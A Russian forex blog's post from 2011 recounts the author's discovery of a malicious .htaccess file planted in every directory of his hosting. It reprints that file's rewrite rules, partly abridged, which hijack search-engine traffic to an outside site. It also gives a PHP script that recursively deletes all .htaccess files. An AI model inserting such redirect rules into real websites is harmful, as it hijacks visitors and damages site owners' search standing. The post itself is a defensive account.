• Home
  • Трейдеру
    • Видеоотчеты моей торговли на рынке Forex
    • Аналитика форекс
      • Форекс отчеты
      • Форекс прогнозы
    • Инструменты форекс трейдера
      • Форекс индикаторы
      • Форекс советники
      • Форекс стратегии
      • Индикатор спроса на рынке Форекс
    • Рейтинг форекс брокеров — список качественных брокеров по версии blog.in-vesto.ru
  • Инвестору
    • Инструменты для вложения денег
    • Рейтинги инвестиционных инструментов
      • Рейтинг ПАММ-счетов Alpari
      • Рейтинг ПАММ-счетов Amarkets.org
      • Рейтинг ПАММ-счетов компании FxOpen
    • Сервисы для инвесторов
      • Проверить надежность инвестиционной компании
      • Калькулятор сложных процентов инвестора
      • Калькулятор дохода в Альпари
  • Обучение
    • Обучение форекс трейдингу
    • Наше обучение
    • Персональное обучение инвестированию
    • Отзывы об обучении у Андрея Малахова
  • Статьи
  • Об авторе
    • Обо мне
    • Отзывы об Андрее Малахове
    • Интервью
    • Я Вконтакте
    • Служба поддержки
  • Бесплатно
    • Бесплатные видеокурсы
      • Пентаграмма прибыли Часть 0
      • Пентаграмма прибыли Часть 1
      • Пентаграмма прибыли Часть 2
      • Пентаграмма прибыли Часть 3
      • Пентаграмма прибыли Часть 5
      • Памм-инвестор за 30 дней
      • 4 книги и 30 часов видео по инвестированию
    • Видеообучение форекс трейдингу
      • 6 ошибок трейдеров
      • МКФТ День 1
      • МКФТ День 2
      • МКФТ День 3
        • Мои разработки
  • Контакты
    • Facebook
    • Twitter
    • Google+
    • Вконтакте
    • RSS Feed
    • Linked
    • Youtube
 
На своем примере форекс трейдер показывает, как перестать сливать деньги и начать жить с трейдинга

Последние записи

  • Трейдер по имени «Я все знаю»
  • Отчет о моем опыте трейдинга чуть больше года спустя
  • Обзор рынка криптовалют от 25 сентября 2018 года — пока еще 99% активов падают
  • Сигналы рынка Forex от 21 сентября 2018 от Андрея Малахова
  • Сигналы рынка Forex от 19 сентября 2018 от Андрея Малахова
Главная > Саморазвитие и личностный рост > Текущая статья

Внимание! Хакеры!

AMarkets

Фев 11, 2011 Андрей Малахов Саморазвитие и личностный рост 3


Сегодня решил выпустить заметку, совершенно не соответствующую основной тематике сайта. Но кто сказал, что эта информация не будет полезна рядовым читателям?

Итак суть проблемы была в следующем. Я постоянно слежу за статистикой сайта и где-то в конце января заметил, что поисковые системы не находят мой блог. Точнее они то находят, все страницы в индексе. Но ни одной страницы нет в поисковой выдаче. И так происходило со всеми 5 сайтами на моем хостинге. Единовременно. Это меня удивило и озадачило. 2 недели я думал над этим вопросом, решил несколько багов в каждом сайте, но это не могло повлиять на одномоментное исключение всех моих сайтов. Думал, что проблема в хостинге. Связывался с тех. поддержкой, мне ответили, что хостинг работал стабильно, единственно меняли php на более позднюю версию (на 5.2.14 кажется). В общем никто мне ничего вразумительного сказать так и не смог.

И тут по воле случая (точнее все было закономерно;)) мне понадобилось изучить файл .htaccess. При изучении этого файла возникло желание поэкспериментировать с различными его опциями. Вот и решил сделать пробный такой файл. Написал пару строк. Решил залить на хост. И какое было мое удивление, когда я обнаружил уже залитый файл .htaccess в одной из корневых папок. Я его туда не помещал. Первой мыслью было, что он создан автоматически какой нибудь установленной CMS. Однако в той папке системы управления контентом не было. Любопытность не заставила себя ждать и я решил взглянуть на «готовый» файл .htaccess. Вот его краткое содержание:

.htaccess

# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|
bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|
goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|
rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(q\=cache\:).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Accoona|Ace\sExplorer|Amfibi|
Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]

.........
RewriteCond %{HTTP_COOKIE}      !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$   http://trialworld.net/cgi-bin/r.cgi?p=15005&
i=845831cf&j=318&m=6ac39c617b142eabbdb4a9d51cfcca4c&
h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}
&t=%{TIME}[R=302,L,CO=xccgtswgokoe:1:
%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo

И тогда началось самое интересное! я обратил внимание на 1 и последнюю строки  # exgocgkctswo. Меня это заинтриговало и решил пробить в поиске. В РуНете ничего подобного не было. Зато западный просто кишит сообщениями с этой строкой.

Что оказалось? Каким то образом файл .htaccess с вышеуказанным содержимым попадал в каждый каталог и субкаталог хостинга. При обращении поисковой системы/пользователя к странице, где лежит вирусный файл, сначала исполняется все его содержимое, а потом уже все остальные команды. То есть htaccess переправлял весь трафик с поиска на указанный сайт, а именно http://trialworld.net. Смысл в том, что поисковики это просекли, посчитали редиректом, признаком дорвея и исключили все страницы из выдачи. Обидно блин, но это так. Сейчас исправил все у себя, посмотрим, вернется ли выдача на прежнее место.

Как я боролся со всей этой х.ней. Главная задача состояла в удалении всех htaccess файлов из всех каталогов хостинга. Конечно ручками это было бы напряжно поэтому выкладываю небольшой скрипт. Налетай кому надо. Важный момент!!! Этот скрипт удаляет все .htaccess  файлы из всех каталогов, поэтому желательно бы иметь резервные копии нормальных файлов и адреса куда их потом залить.

RemoveHTACCESS.php

<?php

function searchDir($dir) {
   $dhandle = opendir($dir);
   if ($dhandle) {
      // loop through it
      while (false !== ($fname = readdir($dhandle))) {
         // if the element is a directory, and
         // does not start with a '.' or '..'
         // we call searchDir function recursively
         // passing this element as a parameter
         if (is_dir( "{$dir}/{$fname}" )) {
            if (($fname != '.') && ($fname != '..')) {
               echo "<u>Searching Files in the
              Directory</u>: {$dir}/{$fname} <br />";
               searchDir("$dir/$fname");
            }
         // the element if it is a .htaccess file, we delete it
         } else {
            if($fname == ".htaccess")
            {
                echo "File: {$dir}/{$fname} <br />";
                unlink("{$dir}/{$fname}");
            }
         }
      }
      closedir($dhandle);
    }
}

searchDir(".");

?>

Вышеприведенный скрипт заливаете на хостинг и запускаете. Он ищет все htaccess файлы и удаляет их (в том числе и нормальные). Поэтому необходимые «правильные файлы» заливаете на хостинг из бекапа. И радуетесь возвращению сайтов в ряды получателей посетителей с поисковых систем.

Так как я еще не определил источник этого вируса, сразу сменил пароль от админки хостинга, что и вам советую. Дальше я еще буду исследовать этот вопрос, поэтому следите за моими постами. До скорого…

Подпишитесь на rss-ленту и вы всегда будете в курсе всех событий
Это Андрей Малахов. Продолжение следует…

  • Amarkets.org - выгодные условия торговли на Форекс (подробнее об условиях), реальный доступ к рынку
  • Alpari.ru - только для опытных инвесторов и агрессивных инвестиций
  • Roboforex.com - здесь открыл свой счет для копирования торговых сигналов
  • 5 видеокурсов в одном - по инвестированию в интернет - "Пентаграмма прибыли"

Внимание!
Если в вашей жизни есть необходимость:
- изменить свое мышление
- сформировать новое видение будущего, новый взгляд
- принять важное решение
- изменить себя и свои доходы
- получить мотивацию
- поставить цели и достичь их
- получить любые другие изменения, которые как вам кажется, сложно осуществить

Оставьте заявку на бесплатную коуч-сессию со мной здесь:
--> https://taplink.cc/malahoff_coach <--

Поделитесь этой статьей с друзьями. Они скажут вам "Спасибо!":


  • # exgocgkctswo, ошибка 500, позиции сайта, поисковая выдача, проблемы с продвижением сайта
C днем Св.Валентина! Мотивация - достижение финансовой независимости

Похожие записи
Больше в этом разделе
  • История успеха с ФорексТренд
    История успеха с...

    Янв 19, 2015 0

  • Как сэкономить время и деньги
    Как сэкономить время...

    Янв 04, 2015 0

  • Как научиться экономить деньги?
    Как научиться...

    Дек 29, 2014 0

  • Как экономить свои деньги?
    Как экономить свои...

    Дек 25, 2014 0


3 thoughts on “Внимание! Хакеры!”

  1. Tom 03.05.2011 at 15:57

    U menia toze samoje, i vrode posle tovo kak vzlamal windows 7 ultimate s crackom. Mozet i vy s windowsami igralis pered etim?

    Reply ↓
    1. admin Post author12.05.2011 at 19:41

      Нет, тут дело не в виндовсе. Я его не перестанавливал. Это проблема в доступности хостинга к атаке.

  2. kastorskiy 20.10.2011 at 15:47

    Тоже обнаружил на одном своём сайте аналогичный .htaccess

    Reply ↓

Leave a Reply Отменить ответ

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Если вы сливаете на Forex

Хотите перестать сливать из-за психологических причин? Проработайте с коучем ваши привычные паттерны мышления и действий. Пишите на телеграм Андрею Малахову

Риск-Менеджер - для начинающего и профессионального Forex трейдера. Сохранит ваш депозит от вас самих.

Мне интересна "Эффективная стратегия Форекс трейдинга" от Андрея Малахова

Брокеры для FOREX трейдинга

  • Amarkets.org - выгодные условия торговли на Форекс (подробнее об условиях), реальный доступ к рынку
  • Alpari.com - только для опытных инвесторов и агрессивных инвестиций
  • Roboforex.com - здесь открыл свой счет для копирования торговых сигналов
  • Рейтинг форекс брокеров - по версии сайта http://blog.in-vesto.ru/

Как торговать на Форекс?

ВАЖНО!!!
==>1. Научитесь торговать развороты рынка с моим индикатором PPRx2<==


2. Используйте в своей торговли мои авторские индикаторы входов и выходов с рынка

3. ОБЯЗАТЕЛЬНО Используйте в своей торговле Риск-Менеджер, который будет слежить за соблюдением вами вашех же правил риск-менеджмента

Добавляйтесь в соц. сетях:

Подпишитесь на обновления:





Рубрики

  • Анализ компаний на надежность (13)
  • Аналитика форекс (26)
    • Форекс отчеты (7)
    • Форекс прогнозы (3)
  • Видеоблог (21)
  • Все о криптовалютах (1)
  • Все о форекс (67)
  • Здоровый образ жизни (4)
  • Инструменты форекс трейдера (28)
    • Мои разработки (1)
    • Психология форекс трейдинга (4)
    • Форекс индикаторы (9)
    • Форекс советники (8)
    • Форекс стратегии (6)
  • Истории финансов и финансистов (30)
  • Как заработать деньги в Интернете (111)
  • Как и куда инвестировать (350)
  • Криптовалюты (1)
  • Макроэкономика (32)
  • Отзывы об Андрее Малахове (5)
  • Саморазвитие и личностный рост (85)
  • Удовольствие — мотивация к действиям (21)

Наш твиттер

Твиты пользователя @bigwashing

Предупреждения

Предупреждение о рисках
Политика конфиденциальности
Пользовательское соглашение

Публичная оферта

Внимание! Торговля на валютном рынке Форекс (Forex) сопряжена с финансовыми рисками и подходит не всем инвесторам.

Сайт blog.in-vesto.ru носит исключительно информационный характер и не несет ответственности за последствия принимаемых вами торговых решений, либо работу программного обеспечения.

Начиная работать на валютных рынках, убедитесь, что вы осознаете риски, с которыми сопряжена торговля с использованием кредитного плеча, и что вы имеете достаточный уровень подготовки.

Если вы дочитали до этого момента

Я обращаюсь к вам, как настойчивому и внимательному человеку. Вы уже круче других, т.к. 90% посетителей данного сайта никогда не прочитают данный текст.

У меня именно для вас есть подарок. Я гарантирую вам 30% скидку на любые информационные товары или консультационные услуги, которые вы захотите купить на моем сайте.

При оформлении заказа укажите, что у вас есть 30% скидка, так как вы круче 90% посетителей данного сайта и вы получите данный бонус мгновенно.

Принимаем к оплате

www.megastock.ru Здесь находится аттестат нашего WM идентификатора 825982469848
Проверить аттестат

Принимаем Z-Payment
Copyright 2019 ФЛП Малахов А.В. Все права защищены. При копировании и перепечатке любых материалов - активная ссылка на оригинал обязательна!

Адрес: Украина, г. Запорожье, пр.Соборный,156/29
Телефон: +38-091-935-08-98
email: bigwashing@yandex.ru